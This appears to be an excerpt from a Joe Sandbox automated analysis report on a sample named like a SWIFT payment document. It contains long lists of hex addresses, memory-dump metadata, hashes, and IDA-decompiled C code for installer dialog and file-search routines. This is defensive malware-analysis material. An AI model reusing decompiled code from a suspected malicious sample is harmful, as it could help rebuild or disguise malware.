                                                                                  0x00407056
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073bb
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x00000000
                                                                                  0x004073c8
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00000000
                                                                                  0x00407489
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407194
                                                                                  0x00407197
                                                                                  0x0040719a
                                                                                  0x0040719c
                                                                                  0x0040719e
                                                                                  0x0040719e
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a9
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040749f
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x00000000
                                                                                  0x004075db
                                                                                  0x004074a9
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074b3
                                                                                  0x004074b6
                                                                                  0x004074bc
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c7
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x0040752b
                                                                                  0x0040752e
                                                                                  0x00407533
                                                                                  0x00407534
                                                                                  0x00407536
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00000000
                                                                                  0x0040753b
                                                                                  0x004074cd
                                                                                  0x004074d3
                                                                                  0x004074d6
                                                                                  0x004074d9
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074eb
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x0040750d
                                                                                  0x00407510
                                                                                  0x00407514
                                                                                  0x00407516
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074f8
                                                                                  0x004074fd
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x0040751d
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070cf
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x00000000
                                                                                  0x00407599
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070df
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                  • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                                                  • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                                                  • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040699E(WCHAR* _a4) {
                                                                                  				void* _t2;
                                                                                  
                                                                                  				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                                                  				if(_t2 == 0xffffffff) {
                                                                                  					return 0;
                                                                                  				}
                                                                                  				FindClose(_t2);
                                                                                  				return 0x426798;
                                                                                  			}




                                                                                  0x004069a9
                                                                                  0x004069b2
                                                                                  0x00000000
                                                                                  0x004069bf
                                                                                  0x004069b5
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(746AFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,746AFAA0,?,746AF560,00405D94,?,746AFAA0,746AF560), ref: 004069A9
                                                                                  • FindClose.KERNEL32(00000000), ref: 004069B5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID:
                                                                                  • API String ID: 2295610775-0
                                                                                  • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                  • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                  • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                  • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                                                  C-Code - Quality: 84%
                                                                                  			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                  				struct HWND__* _v28;
                                                                                  				void* _v84;
                                                                                  				void* _v88;
                                                                                  				void* __ebx;
                                                                                  				void* __edi;
                                                                                  				void* __esi;
                                                                                  				signed int _t34;
                                                                                  				signed int _t36;
                                                                                  				signed int _t38;
                                                                                  				struct HWND__* _t48;
                                                                                  				signed int _t67;
                                                                                  				struct HWND__* _t73;
                                                                                  				signed int _t86;
                                                                                  				struct HWND__* _t91;
                                                                                  				signed int _t99;
                                                                                  				int _t103;
                                                                                  				signed int _t117;
                                                                                  				int _t118;
                                                                                  				int _t122;
                                                                                  				signed int _t124;
                                                                                  				struct HWND__* _t127;
                                                                                  				struct HWND__* _t128;
                                                                                  				int _t129;
                                                                                  				intOrPtr _t130;
                                                                                  				long _t133;
                                                                                  				int _t135;
                                                                                  				int _t136;
                                                                                  				void* _t137;
                                                                                  				void* _t145;
                                                                                  
                                                                                  				_t130 = _a8;
                                                                                  				if(_t130 == 0x110 || _t130 == 0x408) {
                                                                                  					_t34 = _a12;
                                                                                  					_t127 = _a4;
                                                                                  					__eflags = _t130 - 0x110;
                                                                                  					 *0x423730 = _t34;
                                                                                  					if(_t130 == 0x110) {
                                                                                  						 *0x42a268 = _t127;
                                                                                  						 *0x423744 = GetDlgItem(_t127, 1);
                                                                                  						_t91 = GetDlgItem(_t127, 2);
                                                                                  						_push(0xffffffff);
                                                                                  						_push(0x1c);
                                                                                  						 *0x421710 = _t91;
                                                                                  						E004045C4(_t127);
                                                                                  						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                                                  						 *0x42922c = E0040140B(4);
                                                                                  						_t34 = 1;
                                                                                  						__eflags = 1;
                                                                                  						 *0x423730 = 1;
                                                                                  					}
                                                                                  					_t124 =  *0x40a39c; // 0x0
                                                                                  					_t136 = 0;
                                                                                  					_t133 = (_t124 << 6) +  *0x42a280;
                                                                                  					__eflags = _t124;
                                                                                  					if(_t124 < 0) {
                                                                                  						L36:
                                                                                  						E00404610(0x40b);
                                                                                  						while(1) {
                                                                                  							_t36 =  *0x423730;
                                                                                  							 *0x40a39c =  *0x40a39c + _t36;
                                                                                  							_t133 = _t133 + (_t36 << 6);
                                                                                  							_t38 =  *0x40a39c; // 0x0
                                                                                  							__eflags = _t38 -  *0x42a284;
                                                                                  							if(_t38 ==  *0x42a284) {
                                                                                  								E0040140B(1);
                                                                                  							}
                                                                                  							__eflags =  *0x42922c - _t136;
                                                                                  							if( *0x42922c != _t136) {
                                                                                  								break;
                                                                                  							}
                                                                                  							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                                                  							if(__eflags >= 0) {
                                                                                  								break;
                                                                                  							}
                                                                                  							_t117 =  *(_t133 + 0x14);
                                                                                  							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                                                  							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                                                  							_push(0xfffffc19);
                                                                                  							E004045C4(_t127);
                                                                                  							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                                                  							_push(0xfffffc1b);
                                                                                  							E004045C4(_t127);
                                                                                  							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                                                  							_push(0xfffffc1a);
                                                                                  							E004045C4(_t127);
                                                                                  							_t48 = GetDlgItem(_t127, 3);
                                                                                  							__eflags =  *0x42a2ec - _t136;
                                                                                  							_v28 = _t48;
                                                                                  							if( *0x42a2ec != _t136) {
                                                                                  								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                                                  								__eflags = _t117;
                                                                                  							}
                                                                                  							ShowWindow(_t48, _t117 & 0x00000008);
                                                                                  							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                                                  							E004045E6(_t117 & 0x00000002);
                                                                                  							_t118 = _t117 & 0x00000004;
                                                                                  							EnableWindow( *0x421710, _t118);
                                                                                  							__eflags = _t118 - _t136;
                                                                                  							if(_t118 == _t136) {
                                                                                  								_push(1);
                                                                                  							} else {
                                                                                  								_push(_t136);
                                                                                  							}
                                                                                  							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                                                  							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                                                  							__eflags =  *0x42a2ec - _t136;
                                                                                  							if( *0x42a2ec == _t136) {
                                                                                  								_push( *0x423744);
                                                                                  							} else {
                                                                                  								SendMessageW(_t127, 0x401, 2, _t136);
                                                                                  								_push( *0x421710);
                                                                                  							}
                                                                                  							E004045F9();
                                                                                  							E00406668(0x423748, E004040A6());
                                                                                  							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                                                  							SetWindowTextW(_t127, 0x423748);
                                                                                  							_push(_t136);
                                                                                  							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                                                  							__eflags = _t67;
                                                                                  							if(_t67 != 0) {
                                                                                  								continue;
                                                                                  							} else {
                                                                                  								__eflags =  *_t133 - _t136;
                                                                                  								if( *_t133 == _t136) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								__eflags =  *(_t133 + 4) - 5;
                                                                                  								if( *(_t133 + 4) != 5) {
                                                                                  									DestroyWindow( *0x429238);
                                                                                  									 *0x422720 = _t133;
                                                                                  									__eflags =  *_t133 - _t136;
                                                                                  									if( *_t133 <= _t136) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                                                  									__eflags = _t73 - _t136;
                                                                                  									 *0x429238 = _t73;
                                                                                  									if(_t73 == _t136) {
                                                                                  										goto L60;
                                                                                  									}
                                                                                  									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                                                  									_push(6);
                                                                                  									E004045C4(_t73);
                                                                                  									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                                                  									ScreenToClient(_t127, _t137 + 0x10);
                                                                                  									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                                                  									_push(_t136);
                                                                                  									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                                                  									__eflags =  *0x42922c - _t136;
                                                                                  									if( *0x42922c != _t136) {
                                                                                  										goto L63;
                                                                                  									}
                                                                                  									ShowWindow( *0x429238, 8);
                                                                                  									E00404610(0x405);
                                                                                  									goto L60;
                                                                                  								}
                                                                                  								__eflags =  *0x42a2ec - _t136;
                                                                                  								if( *0x42a2ec != _t136) {
                                                                                  									goto L63;
                                                                                  								}
                                                                                  								__eflags =  *0x42a2e0 - _t136;
                                                                                  								if( *0x42a2e0 != _t136) {
                                                                                  									continue;
                                                                                  								}
                                                                                  								goto L63;
                                                                                  							}
                                                                                  						}
                                                                                  						DestroyWindow( *0x429238); // executed
                                                                                  						 *0x42a268 = _t136;
                                                                                  						EndDialog(_t127,  *0x421f18);
                                                                                  						goto L60;
                                                                                  					} else {
                                                                                  						__eflags = _t34 - 1;
                                                                                  						if(_t34 != 1) {
                                                                                  							L35:
                                                                                  							__eflags =  *_t133 - _t136;
                                                                                  							if( *_t133 == _t136) {
                                                                                  								goto L63;
                                                                                  							}
                                                                                  							goto L36;
                                                                                  						}
                                                                                  						_push(0);
                                                                                  						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                                                  						__eflags = _t86;
                                                                                  						if(_t86 == 0) {
                                                                                  							goto L35;
                                                                                  						}
                                                                                  						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                                                  						__eflags =  *0x42922c;
                                                                                  						return 0 |  *0x42922c == 0x00000000;
                                                                                  					}
                                                                                  				} else {
                                                                                  					_t127 = _a4;
                                                                                  					_t136 = 0;
                                                                                  					if(_t130 == 0x47) {
                                                                                  						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                                                  					}
                                                                                  					_t122 = _a12;
                                                                                  					if(_t130 != 5) {
                                                                                  						L8:
                                                                                  						if(_t130 != 0x40d) {
                                                                                  							__eflags = _t130 - 0x11;
                                                                                  							if(_t130 != 0x11) {
                                                                                  								__eflags = _t130 - 0x111;
                                                                                  								if(_t130 != 0x111) {
                                                                                  									goto L28;
                                                                                  								}
                                                                                  								_t135 = _t122 & 0x0000ffff;
                                                                                  								_t128 = GetDlgItem(_t127, _t135);
                                                                                  								__eflags = _t128 - _t136;
                                                                                  								if(_t128 == _t136) {
                                                                                  									L15:
                                                                                  									__eflags = _t135 - 1;
                                                                                  									if(_t135 != 1) {
                                                                                  										__eflags = _t135 - 3;
                                                                                  										if(_t135 != 3) {
                                                                                  											_t129 = 2;
                                                                                  											__eflags = _t135 - _t129;
                                                                                  											if(_t135 != _t129) {
                                                                                  												L27:
                                                                                  												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                                                  												goto L28;
                                                                                  											}
                                                                                  											__eflags =  *0x42a2ec - _t136;
                                                                                  											if( *0x42a2ec == _t136) {
                                                                                  												_t99 = E0040140B(3);
                                                                                  												__eflags = _t99;
                                                                                  												if(_t99 != 0) {
                                                                                  													goto L28;
                                                                                  												}
                                                                                  												 *0x421f18 = 1;
                                                                                  												L23:
                                                                                  												_push(0x78);
                                                                                  												L24:
                                                                                  												E0040459D();
                                                                                  												goto L28;
                                                                                  											}
                                                                                  											E0040140B(_t129);
                                                                                  											 *0x421f18 = _t129;
                                                                                  											goto L23;
                                                                                  										}
                                                                                  										__eflags =  *0x40a39c - _t136; // 0x0
                                                                                  										if(__eflags <= 0) {
                                                                                  											goto L27;
                                                                                  										}
                                                                                  										_push(0xffffffff);
                                                                                  										goto L24;
                                                                                  									}
                                                                                  									_push(_t135);
                                                                                  									goto L24;
                                                                                  								}
                                                                                  								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                                                  								_t103 = IsWindowEnabled(_t128);
                                                                                  								__eflags = _t103;
                                                                                  								if(_t103 == 0) {
                                                                                  									L63:
                                                                                  									return 0;
                                                                                  								}
                                                                                  								goto L15;
                                                                                  							}
                                                                                  							SetWindowLongW(_t127, _t136, _t136);
                                                                                  							return 1;
                                                                                  						}
                                                                                  						DestroyWindow( *0x429238);
                                                                                  						 *0x429238 = _t122;
                                                                                  						L60:
                                                                                  						_t145 =  *0x425748 - _t136; // 0x0
                                                                                  						if(_t145 == 0 &&  *0x429238 != _t136) {
                                                                                  							ShowWindow(_t127, 0xa);
                                                                                  							 *0x425748 = 1;
                                                                                  						}
                                                                                  						goto L63;
                                                                                  					} else {
                                                                                  						asm("sbb eax, eax");
                                                                                  						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                                                  						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                  							L28:
                                                                                  							return E0040462B(_a8, _t122, _a16);
                                                                                  						} else {
                                                                                  							ShowWindow(_t127, 4);
                                                                                  							goto L8;
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  			}
































                                                                                  0x004040d0
                                                                                  0x004040d7
                                                                                  0x0040423e
                                                                                  0x00404242
                                                                                  0x00404246
                                                                                  0x00404248
                                                                                  0x0040424d
                                                                                  0x00404258
                                                                                  0x00404263
                                                                                  0x00404268
                                                                                  0x0040426a
                                                                                  0x0040426c
                                                                                  0x0040426f
                                                                                  0x00404274
                                                                                  0x00404282
                                                                                  0x0040428f
                                                                                  0x00404296
                                                                                  0x00404296
                                                                                  0x00404297
                                                                                  0x00404297
                                                                                  0x0040429c
                                                                                  0x004042a2
                                                                                  0x004042a9
                                                                                  0x004042af
                                                                                  0x004042b1
                                                                                  0x004042f1
                                                                                  0x004042f6
                                                                                  0x004042fb
                                                                                  0x004042fb
                                                                                  0x00404300
                                                                                  0x00404309
                                                                                  0x0040430b
                                                                                  0x00404310
                                                                                  0x00404316
                                                                                  0x0040431a
                                                                                  0x0040431a
                                                                                  0x0040431f
                                                                                  0x00404325
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404330
                                                                                  0x00404336
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040433f
                                                                                  0x00404347
                                                                                  0x0040434c
                                                                                  0x0040434f
                                                                                  0x00404355
                                                                                  0x0040435a
                                                                                  0x0040435d
                                                                                  0x00404363
                                                                                  0x00404368
                                                                                  0x0040436b
                                                                                  0x00404371
                                                                                  0x00404379
                                                                                  0x0040437f
                                                                                  0x00404385
                                                                                  0x00404389
                                                                                  0x00404390
                                                                                  0x00404390
                                                                                  0x00404390
                                                                                  0x0040439a
                                                                                  0x004043ac
                                                                                  0x004043b8
                                                                                  0x004043bd
                                                                                  0x004043c7
                                                                                  0x004043cd
                                                                                  0x004043cf
                                                                                  0x004043d4
                                                                                  0x004043d1
                                                                                  0x004043d1
                                                                                  0x004043d1
                                                                                  0x004043e4
                                                                                  0x004043fc
                                                                                  0x004043fe
                                                                                  0x00404404
                                                                                  0x00404419
                                                                                  0x00404406
                                                                                  0x0040440f
                                                                                  0x00404411
                                                                                  0x00404411
                                                                                  0x0040441f
                                                                                  0x00404430
                                                                                  0x00404446
                                                                                  0x0040444d
                                                                                  0x00404453
                                                                                  0x00404457
                                                                                  0x0040445c
                                                                                  0x0040445e
                                                                                  0x00000000
                                                                                  0x00404464
                                                                                  0x00404464
                                                                                  0x00404466
                                                                                  0x00000000
